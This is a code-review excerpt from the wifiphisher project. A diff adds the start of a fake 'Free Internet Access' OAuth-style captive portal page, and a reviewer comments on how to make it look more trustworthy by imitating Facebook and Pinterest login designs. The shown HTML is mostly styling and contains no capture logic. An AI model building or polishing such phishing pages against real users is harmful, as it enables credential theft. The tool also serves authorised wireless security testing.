wifiphisher/phishing-pages/oauth-login/index.html

```diff
@@ -0,0 +1,81 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <title>Free Internet Access</title>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <link rel="stylesheet" href="bootstrap.min.css">
+  <link href="bootstrap-social.css" rel="stylesheet">
+  <link href="font-awesome.css" rel="stylesheet">
+  <script src="jquery.min.js"></script>
+  <script src="bootstrap.min.js"></script>
+  <!-- CSS -->
+  <style type="text/css">
+    body {
+          padding-top: 40px;
+          padding-bottom: 40px;
+          background-color: #eee;
+          }
+
+          .form-signin {
+            max-width: 330px;
+            padding: 15px;
+            margin: 0 auto;
+          }
+          .form-signin .form-signin-heading,
+          .form-signin .checkbox {
+            margin-bottom: 10px;
+          }
+
+          .form-signin .form-control {
+            position: relative;
+            height: auto;
+            -webkit-box-sizing: border-box;
+            -moz-box-sizing: border-box;
+            box-sizing: border-box;
+            padding: 10px;
+            font-size: 16px;
+          }
+          .form-signin .form-control:focus {
+            z-index: 2;
+          }
+          .form-signin input[type="email"] {
+            margin-bottom: 1em;
+            border-bottom-right-radius: 0;
+            border-bottom-left-radius: 0;
+          }
+          .form-signin input[type="password"] {
+            margin-bottom: 2em;
+            border-top-left-radius: 0;
+            border-top-right-radius: 0;
+          }
+  </style>
+</head>
+<body>
+  <div class="container .text-center social-buttons">
+    <p class="lead">In order to connect to internet please sign in below.</p>
```

Comment:
We need to be careful with the <a href="https://developers.facebook.com/docs/facebook-login/userexperience/">User Experience Design</a>. I like <a href="https://scontent.fath2-1.fna.fbcdn.net/t39.2178-6/11891341_949716731756775_1421571690_n.png">Pinterest</a> approach. 

Something like "Get connected to the Internet for free" looks better. Then a subtitle "A simple, no frills Wi-Fi service." I took the idea from <a href="https://bughardy.me/content/images/2015/Feb/captive-portal-example.png">here</a>.

Btw, I'm using Chrome and the title is not centered.